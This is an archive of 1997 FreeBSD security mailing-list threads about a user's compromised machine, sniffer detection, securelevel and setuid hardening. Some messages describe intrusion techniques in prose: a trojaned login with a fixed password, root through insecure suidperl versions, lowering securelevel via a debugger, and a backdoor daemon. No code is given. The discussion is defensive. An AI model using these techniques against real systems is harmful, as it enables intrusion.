by time.cdrom.com (8.8.6/8.6.9) with ESMTP id XAA06986; Mon, 28 Jul 1997 23:11:24 -0700 (PDT) To: Nate Williams cc: Vincent Poy , "Jonathan A. Zdziarski" , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 22:09:50 MDT." <199707290409.WAA10250@rocky.mt.sri.com> Date: Mon, 28 Jul 1997 23:11:24 -0700 Message-ID: <6982.870156684@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Apparently you've yet to find a clue. Go rub yourself with clue juice, > and dance the clue dance, and maybe you'll get one. Is this based on the famous "you couldn't get a clue if you smeared yourself in clue-musk and danced naked in a field full of horny clues during clue mating season" quote? ;-) Jordan From owner-freebsd-security Mon Jul 28 23:13:20 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA14272 for security-outgoing; Mon, 28 Jul 1997 23:13:20 -0700 (PDT) Received: from ravian.globalxs.nl (root@ravian.GlobalXS.nl [143.178.250.5]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA14265 for ; Mon, 28 Jul 1997 23:13:17 -0700 (PDT) Received: from cremers.globalxs.nl (ztm04-06.dial.xs4all.nl [194.109.32.103]) by ravian.globalxs.nl (8.7.4/8.7.3) with SMTP id IAA04608 for ; Tue, 29 Jul 1997 08:13:13 +0200 Message-Id: <199707290613.IAA04608@ravian.globalxs.nl> Comments: Authenticated sender is From: "Museum Security Mailinglist" To: security@FreeBSD.ORG Date: Tue, 29 Jul 1997 08:15:10 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: security-digest V3 #60 Reply-to: securma@xs4all.nl Priority: normal In-reply-to: <199707282118.OAA03650@hub.freebsd.org> X-mailer: Pegasus Mail for Win32 (v2.53/R1) Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk unsubscribe securma@xs4all.nl thanks, ---- The Museum Security Network dedicated to protection of cultural property http://museum-security.org/ http://www.xs4all.nl/~securma/ subscribe@museum-security.org unsubscribe@museum-security.org/ ---- From owner-freebsd-security Mon Jul 28 23:17:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA14469 for security-outgoing; Mon, 28 Jul 1997 23:17:07 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA14464 for ; Mon, 28 Jul 1997 23:17:05 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id XAA07009; Mon, 28 Jul 1997 23:17:05 -0700 (PDT) To: Vincent Poy cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 22:15:02 PDT." Date: Mon, 28 Jul 1997 23:17:05 -0700 Message-ID: <7005.870157025@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > I'm planning to reinstall all the binaries anyways but it's kind of hard > when I'm in Northern California and the owners are out of the country for > 2-4 months leaving the machines in the closet totally unattended. I know Wonderful. That sounds like a freakin' nightmare. :( Jordan From owner-freebsd-security Tue Jul 29 00:14:58 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id AAA19228 for security-outgoing; Tue, 29 Jul 1997 00:14:58 -0700 (PDT) Received: from ns.cs.msu.su (laskavy@redsun.cs.msu.su [158.250.10.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id AAA19217 for ; Tue, 29 Jul 1997 00:14:50 -0700 (PDT) Received: (from laskavy@localhost) by ns.cs.msu.su (8.8.6/8.6.12) id LAA04724; Tue, 29 Jul 1997 11:13:24 +0400 (DST) Date: Tue, 29 Jul 1997 11:13:24 +0400 (DST) Message-Id: <199707290713.LAA04724@ns.cs.msu.su> From: "Sergei S. Laskavy" To: langfod@dihelix.com CC: vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net In-reply-to: <199707281830.IAA15209@caliban.dihelix.com> (langfod@dihelix.com) Subject: Re: security hole in FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk >>>>> "David" == David Langford writes: David> I recently caught a breakin faily simaliar. The perp [...] David> replace /bin/login with one that would let them login to David> ANY account with a password of "lemmein". The login would David> NOT be logged and so it was very difficult to tell what was David> going on. David> My only guess is that they used the old suidperl hack to David> get root. Supposedly this doesnt work on newer perl David> though. Please, add a note about insecure sperl4.036 and sperl5.003 somewhere in ERRATA.TXT or in SECURITY.TXT or even in README.TXT and maybe in some other appropriate places. People are still just downloading the "bin" distribution and then hackers are able to gain root easily. David> My suggestion to you would be to get a clean source tree, David> recompile everything and install tripwire. David> -David Langford langfod@dihelix.com From owner-freebsd-security Tue Jul 29 01:12:25 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id BAA23050 for security-outgoing; Tue, 29 Jul 1997 01:12:25 -0700 (PDT) Received: from ns.okbmei.msk.su (gw2.okbmei.msk.su [194.190.170.19]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id BAA23045; Tue, 29 Jul 1997 01:12:18 -0700 (PDT) Received: (from davydov@localhost) by ns.okbmei.msk.su (8.8.6/8.8.6) id MAA21150; Tue, 29 Jul 1997 12:11:58 +0400 (MSD) Message-Id: <199707290811.MAA21150@ns.okbmei.msk.su> Subject: UNSUBSCRIBE In-Reply-To: <7005.870157025@time.cdrom.com> from "Jordan K. Hubbard" at "Jul 28, 97 11:17:05 pm" To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Tue, 29 Jul 1997 12:11:58 +0400 (MSD) Cc: majordomo@freebsd.org, freebsd-security@freebsd.org From: "Andrew L. Davydov" Reply-To: "Andrew L. Davydov" Organization: OKB MEI X-Mailer: ELM [version 2.4ME+ PL31H (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk unsubscribe freebsd-security davydov@ns.okbmei.msk.su Please !!!!!!!!!!! --------------------- Mr. Andrew L. Davydov Network Manager - UniForum Member From owner-freebsd-security Tue Jul 29 02:06:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id CAA26453 for security-outgoing; Tue, 29 Jul 1997 02:06:07 -0700 (PDT) Received: from milehigh.denver.net (milehigh.denver.net [204.144.180.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id CAA26446; Tue, 29 Jul 1997 02:06:00 -0700 (PDT) Received: from localhost (jdc@localhost) by milehigh.denver.net (8.8.5/8.8.5) with SMTP id DAA02716; Tue, 29 Jul 1997 03:09:29 -0600 (MDT) Date: Tue, 29 Jul 1997 03:09:29 -0600 (MDT) From: John-David Childs To: Gary Palmer cc: "Nicole H." , security@FreeBSD.ORG Subject: RE: detecting packet sniffers In-Reply-To: <6954.870136449@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Gary Palmer wrote: > "Nicole H." wrote in message ID > : > > > > Does anyone know of a good way to detect people "sniffing" on the > > network? IE a program that will detect a machine running in > > promiscuous mode? > > There is no way to detect that from outside the machine ... after all, > its just listening to all the packets that go past. > > FreeBSD 2.2 and later log a message to console when an interface goes > into promiscuous mode. I was under the impression from reading various product literatures that a trend in the industry is beginning...whereby packet sniffers will periodically send "tokens" on the wire identifying that XYZ PacketSniffer was being used. There was an NT/SunOS commercial security application I saw a few weeks ago which claimed to be able to detect some (not all) other sniffers on the wire...I just can't remember where I saw it. Time to go digging through my archives ;) -- John-David Childs (JC612) @denver.net/Internet-Coach/@ronan.net System Administrator Enterprise Internet Solutions & Network Engineer 901 E 17th Ave, Denver 80218 "When you have to kill a man it costs nothing to be polite." -- Winston Curchill, On formal declarations of war From owner-freebsd-security Tue Jul 29 02:59:31 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id CAA00533 for security-outgoing; Tue, 29 Jul 1997 02:59:31 -0700 (PDT) Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id CAA00527 for ; Tue, 29 Jul 1997 02:59:15 -0700 (PDT) Received: from localhost (narvi@localhost) by haldjas.folklore.ee (8.8.4/8.8.4) with SMTP id MAA24905; Tue, 29 Jul 1997 12:49:14 +0300 (EEST) Date: Tue, 29 Jul 1997 12:49:13 +0300 (EEST) From: Narvi To: Vincent Poy cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Matthew N. Dodd wrote: > > =)On Mon, 28 Jul 1997, Vincent Poy wrote: > =)> True but if you needed to compile -current, you would need to > =)> remove the schg flags on some binaries before the make world. > =) > =)I was under the impression that doing a 'make world' in multiuser mode > =)wasn't optimal. > > I know but when all the admins are remote, it has to be done > multiuser. Is there a way to push the secure level up to 2 and then push > it down when a make world is needed? NO. Once it is up, it can not be brought down. That's the idea behind it. Sander There is no love, no good, no happiness and no future - all these are just illusions. > > Cheers, > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ > Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] > GaiaNet Corporation - M & C Estate / / / / | / | __] ] > Beverly Hills, California USA 90210 / / / / / |/ / | __] ] > HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > From owner-freebsd-security Tue Jul 29 03:44:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id DAA03309 for security-outgoing; Tue, 29 Jul 1997 03:44:07 -0700 (PDT) Received: from artorius.sunflower.com (artorius.sunflower.com [24.124.0.13]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id DAA03304 for ; Tue, 29 Jul 1997 03:44:02 -0700 (PDT) Received: from localhost (lists@localhost) by artorius.sunflower.com (8.8.6/8.8.5) with SMTP id FAA10176; Tue, 29 Jul 1997 05:43:29 -0500 (CDT) Date: Tue, 29 Jul 1997 05:43:29 -0500 (CDT) From: "Stephen D. Spencer" To: Robert Watson cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Robert, That problem is much less prevalent on cable modem systems (or potentially less of a problem :) As a cable-internet ISP, it was decided before we made the service available that there is no reason to give customers shell access to our main servers. It is an obvious requirement of such a network for potential customers to have their own machine. They can configure tcp/ip clients to their hearts' content, and if they really want a *nix shell, there's Linux and the various BSD derivatives. We offer pop3 accounts, but many of our customers have their mail directly delivered to their personal machines. This cuts down on the number of login requests that are being passed over various segments to our main servers. Also, the cable modems that we use (Zenith Homeworks Universal) operate on a MAC filter concept (limits the number of machines connected to any given modem) and cannot be put into a promisciuous mode by the customer. -Stephen Spencer admin guy Sunflower Datavision Lawrence, KS On Mon, 28 Jul 1997, Robert Watson wrote: > > Well, once you have one host, you have all the hosts on the same ethernet > segment. Typically, though, problems with sniffing occur on college dorm > networks, which run large numbers of less-well-managed Linux/etc hosts. > This may be an increasing problem on Cable-modem networks, which I > understand work something like Ethernet, in that they are broadcast > networks for a local segment. Also, who is to say that occasionally > routers or ISP machines don't get broken into, and sniffing occurs? Any > of your users could be logging in from an untrusted network, so in essense > you are relying on that network to be secure as well as your own. From owner-freebsd-security Tue Jul 29 05:32:46 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA08434 for security-outgoing; Tue, 29 Jul 1997 05:32:46 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id FAA08423 for ; Tue, 29 Jul 1997 05:32:41 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id IAA06017; Tue, 29 Jul 1997 08:32:21 -0400 (EDT) Date: Tue, 29 Jul 1997 08:32:21 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Vincent Poy cc: Brian Buchanan , freebsd-security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Brian Buchanan wrote: > > =)Uh, that would defeat the purpose of securelevel. It's not supposed to be > =)possible to ever lower it, except when dropping into single-user mode, and > =)even allowing init to do so in that instance is risky IMHO - a few months > =)ago I reported a hole, which I believe was fixed, that made it possible to > =)lower the securelevel by attaching a debugger to init. Even though that's > =)plugged now, it's still possible that there's another way to fool the > =)kernel into thinking that process 1 is requesting that securelevel be > =)lowered. > > Anything is possible since nothing is unhackable. Would running > init at securelevel 2 and then have it reboot multi-user at a lower level > be possible? I disagree with the assertation that nothing is unhackable. My toaster is unhackable. :) Depending on how you define hack, of course. But in a similar vein: you say you have been carefully following the latest version releases, and patching all known bugs. That is not sufficient. A site needs a good security policy as well as patching known bugs. For example, you should have been using ssh the entire time, and have copied the public keys for the hosts to your client machine using sneaker-net. Sending any unencrypted data to/from a host, especially sensitive information like the root password, is an extremely bad idea. Similarly, careful analysis of the trust relationships between the machines and accounts on the machines is important -- constructing a bad DNS structure can invalidate your whole security design, as if DNS is corrupted, all the .rhosts stuff is vulnerable. Ideally, you would only use .rhosts in combination with SSH, and then make sure that the appropriate keys are in /etc/ssh_whatever, and deny connections that did not match the predefined keys of all hosts. Key distribution is one of the big downsides to SSH, but floppy disks can help here. Applications like web servers may themselves represent no immediate or known security problems, but often-times web servers use third party CGI programs, available publicly in source, or written by a third party for the web server. Many web programs are notoriously sloppy (or ignorant), and this has not been helped by the release of a number of CGI programming books that haven't even touched on the issue of security. It has been shown time and time again that greater access for an attacker increases risk, and most CGI bugs allow shell access to the host, albeit as www or nobody. Even those are problematic. And once someone is in to the system, they can get around simple solutions like disabling inetd. In 15 seconds, I can compile and run a daemon that lets me back into an account on a higher port number, and unless you know your tools are good, and how to use them, you won't be able to tell. I certainly won't appear in the logs. :) In the case of someone else's machine, you probably can't do anything to get rid of the CGI problems, so that really leaves you with just minimizing the risks in the OS. You've already touched on SUID programs -- as many as possible should be disabled. If you have console access, just disable root also, as you can login as root directly. Most programs do not require suid, if you don't mind administrating as root. Su'ing to root is clearly a risky activity, especially if you're logged in unencrypted. Setting a high secure-level, as well as mounting all file systems w/o setuid support, can make a big difference. Mount all file systems but root as nodev, and things should move along some also. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Tue Jul 29 05:53:59 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA09782 for security-outgoing; Tue, 29 Jul 1997 05:53:59 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id FAA09768 for ; Tue, 29 Jul 1997 05:53:54 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id IAA12447; Tue, 29 Jul 1997 08:50:07 -0400 (EDT) From: Adam Shostack Message-Id: <199707291250.IAA12447@homeport.org> Subject: Re: security hole in FreeBSD In-Reply-To: from Robert Watson at "Jul 28, 97 04:55:19 pm" To: robert+freebsd@cyrus.watson.org Date: Tue, 29 Jul 1997 08:50:07 -0400 (EDT) Cc: adam@homeport.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Robert Watson wrote: | On Mon, 28 Jul 1997, Adam Shostack wrote: | | > Vincent Poy wrote: | > | > su really should be setuid. Everything else is debatable. My | > advice is to turn off all setuid bits except those you know you need | > (possibly w, who, ps, ping, at, passwd) | Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc) | require root access to delivery to local mailboxes; crontab related stuff, | terminal locking, some kerberos commands, local XWindows servers, and su | all rely on suid. I know no one who still runs uucp. There are a few holdouts, but most systems can leave uucp off with no pain. Ditto with kerberos. :) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Tue Jul 29 06:35:25 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA12622 for security-outgoing; Tue, 29 Jul 1997 06:35:25 -0700 (PDT) Received: from fes3.cs.tol.it (mail.tin.it [194.243.154.39]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA12615 for ; Tue, 29 Jul 1997 06:35:16 -0700 (PDT) Received: from Potenza4-6.tin.it (Potenza4-10.tin.it [195.31.145.201]) by fes3.cs.tol.it (8.8.4/8.8.4) with SMTP id PAA23989; Tue, 29 Jul 1997 15:30:04 +0200 (MET DST) Message-ID: <33DE6FBD.4B7E@tin.it> Date: Tue, 29 Jul 1997 15:33:34 -0700 From: Rocco Lucia Reply-To: rlucia@tin.it X-Mailer: Mozilla 3.0 (Win16; I) MIME-Version: 1.0 To: Annelise Anderson CC: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Annelise Anderson wrote: > > On Mon, 28 Jul 1997, John Preisler wrote: > > > I'm not convinced that FreeBSD installs a /root/.rhosts by default. > > None of my boxes have it. > > > > -jrp > > Neither do mine. > > Annelise sorry from beeing late ... but... neither do mine Rocco From owner-freebsd-security Tue Jul 29 06:40:33 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA13106 for security-outgoing; Tue, 29 Jul 1997 06:40:33 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA13096 for ; Tue, 29 Jul 1997 06:40:30 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id JAA06132; Tue, 29 Jul 1997 09:40:16 -0400 (EDT) Date: Tue, 29 Jul 1997 09:40:16 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Adam Shostack cc: robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707291250.IAA12447@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Adam Shostack wrote: > I know no one who still runs uucp. There are a few holdouts, but most > systems can leave uucp off with no pain. Ditto with kerberos. :) Hey! I run Kerberos! :) Actually, the only Kerberos command that requires suid (that I know of) is register, which allows a user on a host to register into Kerberos if they weren't added there administratively by whoever created their account. It's a good migration tool if you have a few servers, NIS, etc, but no risk of overlapping names, but not actually used by very many people at all. In fact, I'm the only person I know of who has ever used it, although I know of quite a few people running Kerberos, especially in academic environments. Register could easily be made suid-something-else, and the keyfile it uses be changed to something-else. Perhaps a kerberos user should be created. Similarly, on the main Kerberos server, the kerberos daemon (and files) are owned by root. The kerberos daemon could be made to setuid() to a kerberos user once the bind() has taken place (plea for a non-root bind!) and run as non-root from then on fairly easily. Just because it's an authentication system doesn't mean it has to run as root. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Tue Jul 29 07:19:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA16058 for security-outgoing; Tue, 29 Jul 1997 07:19:55 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA16045 for ; Tue, 29 Jul 1997 07:19:52 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id IAA12042; Tue, 29 Jul 1997 08:19:41 -0600 (MDT) Date: Tue, 29 Jul 1997 08:19:41 -0600 (MDT) Message-Id: <199707291419.IAA12042@rocky.mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: "Jordan K. Hubbard" Cc: Nate Williams , security@freebsd.org Subject: Re: security hole in FreeBSD In-Reply-To: <6982.870156684@time.cdrom.com> References: <199707290409.WAA10250@rocky.mt.sri.com> <6982.870156684@time.cdrom.com> X-Mailer: VM 6.29 under 19.15 XEmacs Lucid Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Jordan K. Hubbard writes: > > Apparently you've yet to find a clue. Go rub yourself with clue juice, > > and dance the clue dance, and maybe you'll get one. > > Is this based on the famous "you couldn't get a clue if you smeared > yourself in clue-musk and danced naked in a field full of horny > clues during clue mating season" quote? ;-) > The famous (and now missing) Mike Pritchard quote. :) Nate From owner-freebsd-security Tue Jul 29 08:59:29 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA24659 for security-outgoing; Tue, 29 Jul 1997 08:59:29 -0700 (PDT) Received: from GndRsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.241]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA24654 for ; Tue, 29 Jul 1997 08:59:26 -0700 (PDT) Received: (from rgrimes@localhost) by GndRsh.aac.dev.com (8.8.5/8.7.3) id IAA20259; Tue, 29 Jul 1997 08:59:15 -0700 (PDT) From: "Rodney W. Grimes" Message-Id: <199707291559.IAA20259@GndRsh.aac.dev.com> Subject: Re: security hole in FreeBSD In-Reply-To: <5496.870134385@time.cdrom.com> from "Jordan K. Hubbard" at "Jul 28, 97 04:59:45 pm" To: security@freebsd.org Date: Tue, 29 Jul 1997 08:59:14 -0700 (PDT) Cc: vince@mail.mcestate.com X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk [CC: hacked to save a few people extra copies] > > Well, because I connect to the system using telnet ;) Also, this > > That proves absolutely nothing. You think I can't hack a telnetd to > provide multiple "services?" Wake up, Vinnie! :-) 33 mail message from ``Vinnie'' this morning in my mail box, SNR 1:33, I'm not a happy camper :-(. Vince, I understand you have a security problem, could you please go purchase 3 good books on security (thier should be at least 1 or 2 mentioned in the FreeBSD handbook, if not could someone on the list please provide Vince a list of ORA books on security). I know this mailling list is for FreeBSD security related issues, but the level of the questions and answerers being poised here is at the fundemental level of unix system security and the answers can be found in any good book. Regards, -- Rod Grimes rgrimes@gndrsh.aac.dev.com Accurate Automation, Inc. Reliable computers for FreeBSD From owner-freebsd-security Tue Jul 29 09:26:06 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA26446 for security-outgoing; Tue, 29 Jul 1997 09:26:06 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id JAA26427 for ; Tue, 29 Jul 1997 09:25:55 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 1.60 #1) id 0wtF5l-0006nV-00; Tue, 29 Jul 1997 10:25:45 -0600 To: Robert Watson Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) Cc: security@freebsd.org In-reply-to: Your message of "Mon, 28 Jul 1997 21:59:39 EDT." References: Date: Tue, 29 Jul 1997 10:25:45 -0600 From: Warner Losh Message-Id: Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Robert Watson writes: : host. Promiscuous mode simply disables the filter. The only way to : prevent the packets from being sniffable is to prevent them from going on : the wire in question -- smart hubs (switches) do this, so are desirable. Well, there is strong encryption. While it doesn't prevent sniff of the packets, per se, it generally leaves you with garbage and produces the same net effect. Warner From owner-freebsd-security Tue Jul 29 09:35:17 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA27344 for security-outgoing; Tue, 29 Jul 1997 09:35:17 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id JAA27314; Tue, 29 Jul 1997 09:35:04 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 1.60 #1) id 0wtFE5-0006oZ-00; Tue, 29 Jul 1997 10:34:21 -0600 To: Vincent Poy Subject: Re: security hole in FreeBSD Cc: Gary Palmer , John Dowdal , security@freebsd.org, JbHunt , "[Mario1-]" In-reply-to: Your message of "Mon, 28 Jul 1997 22:37:39 PDT." References: Date: Tue, 29 Jul 1997 10:34:21 -0600 From: Warner Losh Message-Id: Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Vincent Poy writes: : I've done that before too... If I don't mention legal action, : they will never respond. I guess they just think it's not their system so : they could care less. We've even pursued legal action against the stupid folks spamming our BIFF port, and they want to fight in the courts rather than fix their @#$@$* config files. Warner From owner-freebsd-security Tue Jul 29 09:53:02 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA28483 for security-outgoing; Tue, 29 Jul 1997 09:53:02 -0700 (PDT) Received: from chaos.amber.org (root@chaos.amber.org [205.231.232.12]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA28477 for ; Tue, 29 Jul 1997 09:53:00 -0700 (PDT) Received: from chaos.amber.org (petrilli@chaos.amber.org [205.231.232.12]) by chaos.amber.org (8.7.5/8.6.12) with SMTP id MAA23141; Tue, 29 Jul 1997 12:52:40 -0400 (EDT) Date: Tue, 29 Jul 1997 12:52:38 -0400 (EDT) From: Christopher Petrilli To: Warner Losh cc: Robert Watson , security@FreeBSD.ORG Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Warner Losh wrote: > In message Robert Watson writes: > : host. Promiscuous mode simply disables the filter. The only way to > : prevent the packets from being sniffable is to prevent them from going on > : the wire in question -- smart hubs (switches) do this, so are desirable. > > Well, there is strong encryption. While it doesn't prevent sniff of > the packets, per se, it generally leaves you with garbage and produces > the same net effect. I will note that there are a few people (ODS and Bay Networks included) who make what is called "secure Ethernet", which basically learns what MAC address is on each port, and scrambles frames that are not destined for that MAC. What usually happens is it replkaces the data paylode with alternating 0/1, and fixes the checksum. It works just fine :-) It's also generally cheaper than a switch. Christopher From owner-freebsd-security Tue Jul 29 09:59:43 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA28893 for security-outgoing; Tue, 29 Jul 1997 09:59:43 -0700 (PDT) Received: from biggusdiskus.flyingfox.com (biggusdiskus.flyingfox.com [206.14.52.27]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA28880 for ; Tue, 29 Jul 1997 09:59:40 -0700 (PDT) Received: (from jas@localhost) by biggusdiskus.flyingfox.com (8.8.5/8.8.5) id JAA25886; Tue, 29 Jul 1997 09:57:36 -0700 (PDT) Date: Tue, 29 Jul 1997 09:57:36 -0700 (PDT) From: Jim Shankland Message-Id: <199707291657.JAA25886@biggusdiskus.flyingfox.com> To: vince@mail.MCESTATE.COM Subject: Re: security hole in FreeBSD Cc: security@freebsd.org Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Vincent Poy writes: > I just verified it and you're right.... I wonder how the .rhosts got > there in the first place. Gee, do you think maybe ... the cracker put it there? Nah. Too obvious. Say, how many email messages have we seen on this thread? The subject line notwithstanding, this is not about a security hole in FreeBSD. The hole is elsewhere. In any event, I'm going to start deleting unread all mail whose subject is "Security hole in FreeBSD"; so, if anyone wishes to report or discuss an actual security hole in FreeBSD, I would be most appreciative if you would use a different subject line for that mail. Thanks in advance. Jim Shankland Flying Fox Computer Systems, Inc. From owner-freebsd-security Tue Jul 29 10:51:56 1997 